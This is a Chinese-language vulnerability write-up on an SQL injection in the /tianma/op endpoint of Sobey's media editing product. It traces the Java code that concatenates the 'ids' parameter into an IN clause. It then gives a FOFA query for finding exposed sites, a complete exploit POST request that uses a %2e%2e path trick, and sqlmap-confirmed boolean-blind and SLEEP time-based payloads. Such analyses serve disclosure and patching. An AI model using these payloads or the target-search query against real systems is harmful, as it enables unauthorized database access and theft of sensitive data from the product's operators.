漏洞简介
索贝产品中的 /sobey-mchEditor/tianma/op 接口存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,获取数据库中的敏感信息,甚至可能导致数据库被完全控制。
影响版本
fofa语法
app="SOBEY-融媒体"
漏洞分析
看下存在漏洞的op方法是如何实现的吧
@RequestMapping({"/op"})
public Response getColumns(@RequestParam("token") String token, @RequestParam("siteCode") String siteCode, @RequestParam("ids") String ids, @RequestParam("opstatus") String opstatus, @RequestParam(value = "ifSetField",required = false,defaultValue = "true") Boolean ifSetField) {
if (StringUtils.isEmpty(ids)) {
return Response.paramError("所选稿件不能为空");
} else {
String opName = this.getOpName(opstatus);
if (StringUtils.isEmpty(opName)) {
return Response.paramError("操作未识别");
} else {
List<String> articleids = Arrays.asList(ids.split(","));
QueryBuilder queryBuilder = new QueryBuilder("SELECT a.id ,c.prop1 FROM zccatalog c INNER JOIN zcnarticle a on a.catalogid = c.id where 1=1 and c.prop1 like '%\\\"tianmaApiUrl\\\"%' ");
SchemaSQLUtil.appendInCondition(queryBuilder, "a.id", articleids);
List<Map<String, Object>> rows = queryBuilder.executeAliasListMap();
参数 ids 使用逗号分割后的数组articleids被带入appendInCondition方法中
public static <T> void appendInCondition(QueryBuilder queryBuilder, String colomnName, Collection<T> values) {
StringBuffer sqlbuffer = new StringBuffer(queryBuilder.getSQL());
appendInCondition(sqlbuffer, colomnName, values);
queryBuilder.setSQL(sqlbuffer.toString());
}
然后又被带入appendInCondition方法中
public static <T> void appendInCondition(StringBuffer sqlbuffer, String colomnName, Collection<T> values) {
appendInCondition(sqlbuffer, colomnName, values, false);
}
public static <T> void appendInCondition(StringBuffer sqlbuffer, String colomnName, Collection<T> values, boolean or) {
if (!or) {
sqlbuffer.append(String.format(" and %s in (", colomnName));
} else {
sqlbuffer.append(String.format(" or %s in (", colomnName));
}
int num = values.size();
for(T value : values) {
sqlbuffer.append(String.format(" '%s' ", value.toString()));
--num;
if (num > 0) {
sqlbuffer.append(",");
}
}
sqlbuffer.append(") ");
}
到这里就很清楚明了了,ids经过一些列的分割传参后,是被直接拼接在in子语句中,从而造成了SQL注入漏洞,由于 ids 参数被逗号分割处理,且每个部分被单引号包围并插入到 IN 子句中,因此注入 payload 必须作为一个单一值(无逗号),通过闭合引号和括号来 breakout,然后添加延时条件,最后使用注释符屏蔽剩余部分。
漏洞复现
POST /sobey-mchEditor/js/%2e%2e/tianma/op HTTP/1.1
Host: sobey.mrxn.net
Content-Type: application/x-www-form-urlencoded
opstatus=up&siteCode=1&token=1&ids=1')SQLI_POC-- -

成功延时 5 秒
SQLMAP结果如下
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: opstatus=up&siteCode=1&token=1&ids=1') OR NOT 2685=2685#
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
Payload: opstatus=up&siteCode=1&token=1&ids=1') OR (SELECT 8771 FROM (SELECT(SLEEP(5)))WWVB)-- QTWL
--- 
